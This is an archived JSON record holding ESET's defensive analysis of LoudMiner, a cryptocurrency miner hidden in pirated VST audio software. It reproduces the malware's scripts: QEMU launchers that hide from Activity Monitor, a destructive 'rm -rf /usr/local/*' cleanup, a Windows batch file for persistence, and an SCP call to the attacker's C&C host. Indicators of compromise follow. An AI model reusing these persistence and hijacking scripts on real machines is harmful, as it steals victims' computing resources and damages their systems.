{
	"id": "095309e9-a9ce-4cc1-8ada-8e8929483c64",
	"created_at": "2026-04-06T00:13:08.57636Z",
	"updated_at": "2026-04-10T13:12:49.598595Z",
	"deleted_at": null,
	"sha1_hash": "1b370fc97d36bfa897803e2e7708ac589f09281f",
	"title": "LoudMiner: Cross-platform mining in cracked VST software",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 522737,
	"plain_text": "LoudMiner: Cross-platform mining in cracked VST software\r\nBy ESET ResearchMichal Malik\r\nArchived: 2026-04-05 22:54:26 UTC\r\nIntroduction\r\nLoudMiner is an unusual case of a persistent cryptocurrency miner, distributed for macOS and Windows since August 2018.\r\nIt uses virtualization software – QEMU on macOS and VirtualBox on Windows – to mine cryptocurrency on a Tiny Core\r\nLinux virtual machine, making it cross platform. It comes bundled with pirated copies of VST software. The miner itself is\r\nbased on XMRig (Monero) and uses a mining pool, thus it is impossible to retrace potential transactions.\r\nDistribution\r\nAt the time of writing, there are 137 VST-related applications (42 for Windows and 95 for macOS) available on a single\r\nWordPress-based website with a domain registered on 24 August, 2018. The first application – Kontakt Native Instruments\r\n5.7 for Windows – was uploaded on the same day. The size of the apps makes it impractical to analyze them all, but it seems\r\nsafe to assume they are all Trojanized.\r\nThe applications themselves are not hosted on the WordPress-based site, but on 29 external servers, which can be found in\r\nthe IoCs section. The admins of the site also frequently update the applications with newer versions, making it difficult to\r\ntrack the very first version of the miner.\r\nRegarding the nature of the applications targeted, it is interesting to observe that their purpose is related to audio production;\r\nthus, the machines that they are installed on should have good processing power and high CPU consumption will not\r\nsurprise the users. Also, these applications are usually complex, so it is not unexpected for them to be huge files. The\r\nattackers use this to their advantage to camouflage their VM images. Moreover, the decision to use virtual machines instead\r\nof a leaner solution is quite remarkable and this is not something we routinely see.\r\nHere are some examples of applications, as well as some comments you can find on the website:\r\nPropellerhead Reason\r\nAbleton Live\r\nSylenth1\r\nNexus\r\nReaktor 6\r\nAutoTune\r\nhttps://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\r\nPage 1 of 13\n\nFigure 1. Comment #1 from the \"admin\r\nFigure 2. Comment #2 from the \"admin\"\r\nUser reports\r\nWe found several forum threads of users complaining about a qemu-system-x86_64 process taking 100% of their CPU on\r\ntheir Mac:\r\nhttps://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\r\nPage 2 of 13\n\nFigure 3. User report #1 (https://discussions.apple.com/thread/250064603)\r\nhttps://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\r\nPage 3 of 13\n\nFigure 4. User report #2 (https://toster.ru/q/608325)\r\nA user named “Macloni” (https://discussions.apple.com/thread/8602989) said the following:\r\n“Unfortunately, had to reinstall OSX, the problem was that Ableton Live 10, which I have downloaded it from a torrent site\r\nand not from the official site, installs a miner too, running at the background causing this.” The same user attached\r\nscreenshots of the Activity Monitor indicating 2 processes – qemu-system-x86_64 and tools-service – taking 25% of CPU\r\nresources and running as root.”\r\nAnalysis of pirated applications\r\nThe general idea of both macOS and Windows analyses stays the same:\r\n1. An application is bundled with virtualization software, a Linux image and additional files used to achieve\r\npersistence.\r\n2. User downloads the application and follows attached instructions on how to install it.\r\n3. LoudMiner is installed first, the actual VST software after.\r\n4. LoudMiner hides itself and becomes persistent on reboot.\r\n5. The Linux virtual machine is launched and the mining starts.\r\n6. Scripts inside the virtual machine can contact the C\u0026C server to update the miner (configuration and binaries).\r\nWhile analyzing the different applications, we’ve identified four versions of the miner, mostly based on how it’s bundled\r\nwith the actual software, the C\u0026C server domain, and something we believe is a version string created by the author.\r\nmacOS\r\nWe’ve identified three macOS versions of this malware so far. All of them include dependencies needed to run QEMU in\r\ninstallerdata.dmg from which all files are copied over to /usr/local/bin and have appropriate permissions set along the way.\r\nEach version of the miner can run two images at once, each taking 128 MB of RAM and one CPU core. Persistence is\r\nachieved by adding plist files in /Library/LaunchDaemons with RunAtLoad set to true. They also have KeepAlive set to\r\ntrue, ensuring the process will be restarted if stopped. Each version has these components:\r\n1. QEMU Linux images.\r\n2. Shell scripts used to launch the QEMU images.\r\n3. Daemons used to start the shell scripts at boot and keep them running.\r\n4. A CPU monitor shell script with an accompanying daemon that can start/stop the mining based on CPU usage and\r\nwhether the Activity Monitor process is running.\r\nThe CPU monitor script can start and stop the mining by loading and unloading the daemon. If the Activity Monitor process\r\nis running, the mining stops. Otherwise, it checks for how long the system has been idle in seconds:\r\nioreg -c IOHIDSystem | awk '/HIDIdleTime/ {print $NF/1000000000; exit}'\r\nIf it’s been longer than 2 minutes, it starts the mining. If it’s been less than 2 minutes, it checks the total CPU usage:\r\nps -A -o %cpu | awk '{s+=$1} END {print s }'\r\ndivides that by the number of CPU cores:\r\nsysctl hw.logicalcpu |awk '{print $2 }')\r\nand if it’s greater than 85%, it stops the mining. The script itself is a bit different across versions, but the general idea stays\r\nthe same.\r\nhttps://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\r\nPage 4 of 13\n\nAfter the installation is done, all miner-related installation files are deleted.\r\nFigure 5. Installation of Polyverse.Music.Manipulator.v1.0.1.macOS.dmg\r\nFigure 6. Polyverse.Music.Manipulator.v1.0.1.macOS.dmg setup instructions\r\nVersion 1\r\nThe miner files in the downloaded application package are not obfuscated in any way or placed in another package; they are\r\ninstalled alongside the software in the following places:\r\n/Library/Application Support/.Qemusys\r\nqemu-system-x86_64 – clean QEMU binary\r\nsys00_1-disk001.qcow2 – Linux image (first)\r\nqemuservice – shell script that launches the first image via the qemu-system-x86_64 binary (see Script 1\r\nlisting)\r\n/Library/Application Support/.System-Monitor\r\nsystem-monitor.daemon – launches first image via system-monitor binary\r\n/usr/local/bin\r\n.Tools-Service\r\nsys00_1-disk001.qcow2 – Linux image (second)\r\ntools-service.daemon – launches second image via tools-service binary\r\ncpumonitor – starts/stops mining based on idle time and CPU usage\r\nhttps://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\r\nPage 5 of 13\n\nsystem-monitor – copy of qemu-system-x86_64 binary\r\ntools-service – copy of qemu-system-x86_64 binary\r\n/Library/LaunchDaemons\r\nbuildtools.system-monitor.plist – launches system-monitor.daemon\r\nbuildtools.tools-service.plist – launches tools-service.daemon\r\nmodulesys.qemuservice.plist – launches qemuservice\r\nsystools.cpumonitor.plist – launches cpumonitor\r\n#!/bin/bash\r\nfunction start {\r\npgrep \"Activity Monitor\"\r\nif [ $? -eq 0 ]; then\r\nlaunchctl unload -w /Library/LaunchDaemons/com.modulesys.qemuservice.plist\r\nelse\r\n/usr/local/bin/qemu-system-x86_64 -M accel=hvf --cpu host /Library/Application\\ Support/.Qemusys/sys00_1-disk001.qcow2 -di\r\nfi\r\n}\r\nstart;\r\nScript 1. qemuservice shell script\r\nAfter the dependencies are copied over, all miner-related daemons are launched and then the actual software is installed:\r\nqemuservice won’t launch the image if the Activity Monitor process is running. In fact, if it is running, it will unload\r\nthe plist that it was launched by.\r\ntools-service.daemon will launch the image only when qemu-system-x86_64 process is not running and after\r\nsleeping for 45 minutes.\r\nSystem-monitor.daemon will launch the image only if Intel i5, i7 or i9 CPU is detected.\r\nThese scripts use the same command to launch the QEMU image, only differing in names and the image path.\r\nWe’ve found the following screenshot related to version 1 of the miner:\r\nFigure 7. CPU consumption of QEMU with Little Snitch (source: https://imgur.com/a/sc3u6kk)\r\nIt is from Little Snitch indicating that some connections from the process qemu-system-x86_64 were blocked. Specifically,\r\nhopto[.]org (a free hostname service) is a C\u0026C used by version 1 of the miner.\r\nVersion 2\r\nMiner files are in data_installer.pkg inside the downloaded application package. data_installer.pkg is installed first, then the\r\nVST software. Before installation, version 1 of the miner is removed along with executing the command:\r\nrm -rf /usr/local/*\r\nAs seen in the listing in Script 2, it only does so when it detects a running qemu-system-x86_64 process.\r\nhttps://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\r\nPage 6 of 13\n\n#!/bin/bash\r\n#Clear Old\r\nfunction clear {\r\nLGC=`ps aux |grep \"qemu-system-x86_64\" |wc -l`\r\nif [ $LGC -ge 2 ]\r\nThen\r\nlaunchctl unload -w /Library/LaunchDaemons/com.modulesys.qemuservice.plist\r\nlaunchctl unload -w /Library/LaunchDaemons/com.buildtools.tools-service.plist\r\nlaunchctl unload -w /Library/LaunchDaemons/com.buildtools.system-monitor.plist\r\nlaunchctl unload -w /Library/LaunchDaemons/com.systools.cpumonitor.plist\r\nrm -f /Library/LaunchDaemons/com.buildtools.system-monitor.plist\r\nrm -f /Library/LaunchDaemons/com.modulesys.qemuservice.plist\r\nrm -f /Library/LaunchDaemons/com.buildtools.tools-service.plist\r\nrm -f /Library/LaunchDaemons/com.systools.cpumonitor.plist\r\nrm -rf /Library/Application\\ Support/.Qemusys\r\nrm -rf /usr/local/bin/.Tools-Service\r\nrm -rf /Library/Application\\ Support/.System-Monitor/\r\nrm -rf /usr/local/*\r\nfi\r\nexit 0\r\n}\r\nclear;\r\nScript 2. data_installer.pkg preinstall script that removes version 1\r\nThe following temporary files are created:\r\n/Users/Shared\r\nz1 - QEMU binary\r\nz1.daemon - launches the QEMU image with the QEMU binary\r\nz1.qcow2 - QEMU image\r\nz1.plist - launches z1.daemon\r\nz3 – CPU monitor script, little change from version 1 cpumonitor\r\nz3.plist - used to launch z3\r\nrandwd - generates random names\r\nAfter dependencies are copied over, the miner is installed. This time the names of QEMU binaries, plists and directories are\r\nrandomized with the randwd script. The miner installation creates two copies of z1, z1.daemon, z1.qcow2 and z1.plist. For\r\neach copy, the following happens:\r\nA directory with a random name is created in /Library/Application Support\r\nThe QEMU binary z1 carries the same name as the directory and is copied into /usr/local/bin\r\nz1.daemon (see listing in Script 3) and z1.qcow2 are copied into this directory under their random names\r\nz1.plist is copied with the name com.\u003crandom_name\u003e.plist into /Library/LaunchDaemons\r\nz1.daemon, z1.plist, z3 and z3.plist files serve as templates. References to other scripts, binaries, plists, etc. in these files are\r\nreplaced by their corresponding generated random name.\r\nA random name is also chosen for the CPU monitor (z3) shell script and its accompanying plist file. z3 is copied into\r\n/usr/local/bin and the plist into /Library/LaunchDaemons under the name com.\u003crandom_name\u003e.plist.\r\n#!/bin/bash\r\nfunction start {\r\npgrep \"Activity Monitor\"\r\nif [ $? -eq 0 ]; then\r\nhttps://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\r\nPage 7 of 13\n\nlaunchctl unload -w /Library/LaunchDaemons/com.AAAA.plist\r\nelse\r\n/usr/local/bin/BBBB -M accel=hvf --cpu host /Library/Application\\ Support/CCCC/DDDD -display none\r\nfi\r\n}\r\nstart;\r\nScript 3. z1.daemon shell script\r\nVersion 2 is a bit cleaner and/or simpler than version 1. There is only one QEMU image, with two copies made; same for the\r\nimage launcher scripts, daemons and the cpumonitor. Even though version 2 randomizes its filenames and directories, it can\r\nonly be installed once because the installation checks for running processes with accel=hvf in their command line.\r\nFrom the version 2 applications we’ve checked so far, the SHA1 hash of the data_installer.pkg is always\r\n39a7e86368f0e68a86cce975fd9d8c254a86ed93.\r\nVersion 3\r\nThe miner files are in an encrypted DMG file, called do.dmg, inside the application package. The DMG is mounted with the\r\nfollowing command:\r\nprintf '%s\\0' 'VeryEasyPass123!' | hdiutil attach -noverify /Users/Shared/instapack/do.dmg -stdinpass.\r\nThe miner DMG contains a single package: datainstallero.pkg. This and the software package are then installed.\r\nThe package contents of datainstallero.pkg and data_installer.pkg from version 2 are more or less the same, but\r\ndatainstallero.pkg adds two obfuscated scripts – clearpacko.sh and installpacko.sh - and obfuscates an existing script –\r\nrandwd:\r\nclearpacko.sh removes version 1 of the miner like version 2 does.\r\ninstallpacko.sh installs the miner the same way version 2 does, except the comments have been stripped from the\r\nscript.\r\nThe SHA1 of the do.dmg remains the same as well: b676fdf3ece1ac4f96a2ff3abc7df31c7b867fb9.\r\nLaunching the Linux image\r\nAll versions use multiple shell scripts to launch the images. The shell scripts are executed by plists on boot and are kept\r\nalive.\r\nVersion 1 executes the following binaries (copies of qemu-system-x86_64) to launch the QEMU images: qemu-system-x86_64, system-monitor, tools-service.\r\nVersions 2 and 3 use the same command, but the filename of the binary, directory in Application Support and the\r\nQEMU filename is randomized.\r\nAll versions use the following switches:\r\n-M accel=hvf to use the Hypervisor framework as an accelerator. HVF was introduced with OS X 10.10 and support\r\nfor HVF was added in QEMU 2.12, which was released in April 2018.\r\n-display none so the virtual machine runs without a graphical interface.\r\nSince the image is launched without specifying the amount of RAM and # of CPU cores, the default values are used: 1 CPU\r\ncore and 128MB of RAM. All versions can launch 2 images.\r\nWindows (version 4)\r\nhttps://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\r\nPage 8 of 13\n\nFrom the strings we extracted from the application, we define the only Windows version seen so far as version 4. As we\r\nmentioned earlier, the logic is quite similar to the macOS version. Each Windows application is packaged as an MSI installer\r\nthat installs both the “cracked” application, and Figure 8 shows the trust popup for installing the VirtualBox driver when\r\nrunning a “cracked” VST installer from vstcrack[.]com.\r\nFigure 8. Trust popup for a VirtualBox driver when running the installation of an application from vstcrack[.]com\r\nVirtualBox is installed in its usual folder name (C:\\Program Files\\Oracle); however, the attributes of the directory are set to\r\n“hidden”. Then the installer copies the Linux image and VBoxVmService (a Windows service used to run a VirtualBox\r\nvirtual machine as a service) into C:\\vms, which is also a hidden directory. Once the installation is complete, the installer\r\nruns a batch script compiled with BAT2EXE (see the unpacked listing in Script 4) to import the Linux image and run\r\nVmServiceControl.exe to start the virtual machine as a service.\r\n@echo off\r\nsetlocal EnableExtensions EnableDelayedExpansion\r\n\"c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage.exe\" setproperty machinefolder \"%userprofile%\\appdata\\roaming\"\r\n\"c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage.exe\" import \"c:\\vms\\tmp\\sys00_1.ova\"\r\nxcopy /Y \"C:\\Windows\\System32\\Config\\systemprofile\\.VirtualBox\" \"C:\\vms\\.VirtualBox\\\"\r\n\"C:\\vms\\VmServiceControl.exe\" -i\r\ndel /F \"c:\\vms\\tmp\\sys00_1.ova\"\r\nScript 4. Batch script used to run the Linux virtual machine as a service\r\nThis method is used to ensure the persistence of the miner after reboot. Indeed, VboxVmService comes with a configuration\r\nfile (see Script 5) in which it is possible to enable the AutoStart option so the virtual machine is automatically launched at\r\nstartup.\r\n[Settings]\r\nVBOX_USER_HOME=C:\\vms\\.VirtualBox\r\nRunWebService=no\r\nPauseShutdown=5000\r\n[Vm0]\r\nVmName=sys00_1\r\nhttps://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\r\nPage 9 of 13\n\nShutdownMethod=acpipowerbutton\nAutoStart=yes\nScript 5. Configuration file for VBoxVmService with AutoStart enabled\nThe OVF file included in the Linux image describes the hardware configuration of the virtual machine (see Script 6): it uses\n1GB of RAM and 2 CPU cores (with a maximum usage of 90%).\nScript 6. Hardware configuration of the Linux image\nLinux image\nThe Linux image is Tiny Core Linux 9.0 configured to run XMRig, as well as some files and scripts to keep the miner\nupdated continuously. The most interesting files are:\n/root/.ssh/{id_rsa, id_rsa.pub} – the SSH pair key used to update the miner from the C\u0026C server using SCP.\n/opt/{bootsync.sh, bootlocal.sh} – the system startup commands that try to update the miner from the C\u0026C server\nand run it (see Scripts 7 and 8):\n/usr/bin/sethostname box\n/opt/bootlocal.sh 2\u003e\u00261 \u003e /dev/null \u0026\necho \"booting\" \u003e /etc/sysconfig/noautologin\nScript 7. bootsync.sh\n/mnt/sda1/tools/bin/idgenerator 2\u003e\u00261 \u003e /dev/null\n/mnt/sda1/tools/bin/xmrig_update 2\u003e\u00261 \u003e /dev/null\n/mnt/sda1/tools/bin/ccommand_update 2\u003e\u00261 \u003e /dev/null\n/mnt/sda1/tools/bin/ccommand 2\u003e\u00261 \u003e /dev/null\n/mnt/sda1/tools/bin/xmrig\nScript 8. bootlocal.sh\n/mnt/sda1/tools/bin – main files and scripts used to update and run the miner.\n/mnt/sda1/tools/xmrig – contains the source code of XMRig (from the GitHub repository).\nThe configuration of the miner is stored in /mnt/sda1/tools/bin/config.json and contains mostly the domain name and the\nport used for the mining pool, which can differ depending on the version (see examples in the IoCs section).\nThe update mechanism is performed via SCP (Secure File Copy) by three different scripts:\nxmrig_update - updates the configuration of the miner (config.json);\nccommand - updates ccommand_update, xmrig_update (see Script 9), updater.sh, xmrig;\nccommand_update - updates ccommand;\nFrom what we have seen, the miner configuration is updated once every day.\nhttps://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\nPage 10 of 13\n\n#!/bin/sh\r\nping -w 40 127.0.0.1\r\ncd /mnt/sda1/tools/bin/ \u0026\u0026 scp -P 5100 -C -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null x01@system-update.is\r\nScript 9. xmrig_update\r\nIn order to identify a particular mining session, a file containing the IP address of the machine and the day’s date is created\r\nby the idgenerator script and its output is sent to the C\u0026C server by the updater.sh script.\r\nProtection\r\nObviously, the best advice to be protected against this kind of threat is to not download pirated copies of commercial\r\nsoftware. There are, however, some hints that can help you to identify when an application contains unwanted code:\r\nA trust popup from an unexpected, “additional” installer (in this case the Oracle network adapter).\r\nHigh CPU consumption by a process you did not install (QEMU or VirtualBox in this case).\r\nA new service added to the startup services list (Windows) or a new Launch Daemon (macOS).\r\nNetwork connections to curious domain names (such as system-update[.]info or system-check[.]services here).\r\nIndicators of Compromise (IoCs)\r\nHashes\r\nmacOS “cracked” applications (versions 1-3)\r\nSHA-1 Filename\r\nESET detection\r\nname\r\nVe\r\nnu\r\n71030028c4e1b844c85138bd77ddea96a190ec2c Virtual_DJ_8_Pro_Infinity_macOS.pkg OSX/LoudMiner.A 1\r\n32c80edcec4f7bb3b494e8949c6f2014b7f5db65 Native Instruments Massive Installer.pkg OSX/LoudMiner.A 1\r\n7dc9f8ca07cd8e0247cf15cd8d2da2190a02fc90 Massive_v1.5.5_Installer_macOS.dmg OSX/LoudMiner.B 2\r\n0b40bd0754637d5be2ada760ff0ecfda7afe03d7 Native_Instruments_Effects_Series_Mod_Pack.dmg OSX/LoudMiner.B 2\r\n88efc767a32299e922f1b41f82c8d584585e2161 Spectrasonics_Omnisphere_2.5_OSx.dmg OSX/LoudMiner.C 3\r\ne9c9d17d006fb03d67b736c0826df0af8ca6d5fd Lennar_Digital_Sylenth1_2.2.1.dmg OSX/LoudMiner.C 3\r\nWindows “cracked” applications (version 4)\r\nSHA-1 Filename\r\nESET detection\r\nname\r\n23faacfc23cfef65504d7fa20854030b96a9df91 Ableton.Live.Suite.10.0.6.Multilingual.x64.WIN.zip Win32/LoudMiner.A\r\n5a8682eae69b2e11d45980941a972bd734630207 Infected-Mushroom-Manipulator-V1.0.3.zip Win32/LoudMiner.A\r\n60a8f1d4a028153271093e815e8267bd25fde852 Sonic_Academy_ANA_2.0.3_x86_x64.msi Win32/LoudMiner.A\r\n7c7876058783da85d5502b9406f7fb4d26f66238 SoundToys_5.0.1_x64-SetupFiles.rar Win32/LoudMiner.A\r\na1a1dc7876d71749a8bc5690c537451770ef4ab8 Valhalla-DSP-Full-Bundle-setupfiles.zip Win32/LoudMiner.A\r\nLinux images\r\nhttps://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\r\nPage 11 of 13\n\nSHA-1 Filename Version number\r\ndd9b89a3c5a88fb679f098e2c2847d22350e23b1 sys00_1-disk001.qcow2 1\r\nd1e42e913da308812dd8da1601531b197c1a09a1 sys00_1-disk001.qcow2 1\r\n39a7e86368f0e68a86cce975fd9d8c254a86ed93 z1.qcow2 (renamed with a randomized name) 2\r\n59026ffa1aa7b60e5058a0795906d107170b9e0f z1.qcow2 (renamed with a randomized name) 3\r\nfcf5c3b560295ee330b97424b7354fd321757cc6 sys00_1.ova 4\r\nfc60431a0172d5b8cf4b34866567656467cf861c sys00_1.ova 4\r\nFilenames\r\nmacOS\r\n/Library/Application Support/.Qemusys\r\n/Library/Application Support/.System-Monitor\r\n/usr/local/bin/{.Tools-Service, cpumonitor, system-monitor, tools-service}\r\n/Library/LaunchDaemons/{com.buildtools.system-monitor.plist, com.buildtools.tools-service.plist,\r\ncom.modulesys.qemuservice.plist, com.systools.cpumonitor.plist}\r\nWindows\r\nC:\\vms\r\nHostnames\r\nvstcrack[.]com (137[.]74.151.144)\r\nDownload hosts (via HTTP on port 80)\r\n185[.]112.156.163\r\n185[.]112.156.29\r\n185[.]112.156.70\r\n185[.]112.157.102\r\n185[.]112.157.103\r\n185[.]112.157.105\r\n185[.]112.157.12\r\n185[.]112.157.181\r\n185[.]112.157.213\r\n185[.]112.157.24\r\n185[.]112.157.38\r\n185[.]112.157.49\r\n185[.]112.157.53\r\n185[.]112.157.65\r\n185[.]112.157.72\r\n185[.]112.157.79\r\n185[.]112.157.85\r\n185[.]112.157.99\r\n185[.]112.158.112\r\n185[.]112.158.133\r\n185[.]112.158.186\r\nhttps://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\r\nPage 12 of 13\n\n185[.]112.158.190\r\n185[.]112.158.20\r\n185[.]112.158.3\r\n185[.]112.158.96\r\nd-d[.]host (185[.]112.158.44)\r\nd-d[.]live (185[.]112.156.227)\r\nd-d[.]space (185[.]112.157.79)\r\nm-m[.]icu (185[.]112.157.118)\r\nUpdate hosts (via SCP)\r\naly001[.]hopto.org (192[.]210.200.87, port 22)\r\nsystem-update[.]is (145[.]249.104.109, port 5100)\r\nMining hosts\r\nsystem-update[.]info (185[.]193.126.114, port 443 or 8080)\r\nsystem-check[.]services (82[.]221.139.161, port 8080)\r\nMITRE ATT\u0026CK techniques\r\nTactic ID Name Description\r\nExecution T1035 Service Execution\r\nOn Windows, the Linux image is run as a service with\r\nVboxVmService.\r\nPersistence\r\nT1050 New Service\r\nInstall the Linux virtual machine as a service with\r\nVboxVmService.\r\nT1062 Hypervisor\r\nInstall a type-2 hypervisor on the host (VirtualBox or\r\nQEMU) to run the miner.\r\nT1160 Launch Daemon\r\nThe macOS versions use a Launch Daemon to ensure the\r\npersistence.\r\nDefense Evasion\r\nT1027\r\nObfuscated Files or\r\nInformation\r\nSome shell scripts are obfuscated, and some installers are\r\nencrypted in macOS versions.\r\nT1045 Software Packing Use BAT2EXE to pack batch script in Windows versions.\r\nT1158\r\nHidden Files and\r\nDirectories\r\nThe VirtualBox installation folder and the directory\r\ncontaining the Linux image are hidden.\r\nCommand and\r\nControl\r\nT1043 Commonly Used Port\r\nUse TCP ports 443 and 8080 for mining pool\r\ncommunication.\r\nT1105 Remote File Copy\r\nUse SCP (port 22 or 5100) to copy files from/to the C\u0026C\r\nserver.\r\nImpact T1496 Resource Hijacking Use victim machines to mine cryptocurrency (Monero).\r\nSource: https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\r\nhttps://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/"
	],
	"report_names": [
		"loudminer-mining-cracked-vst-software"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434388,
	"ts_updated_at": 1775826769,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1b370fc97d36bfa897803e2e7708ac589f09281f.pdf",
		"text": "https://archive.orkl.eu/1b370fc97d36bfa897803e2e7708ac589f09281f.txt",
		"img": "https://archive.orkl.eu/1b370fc97d36bfa897803e2e7708ac589f09281f.jpg"
	}
}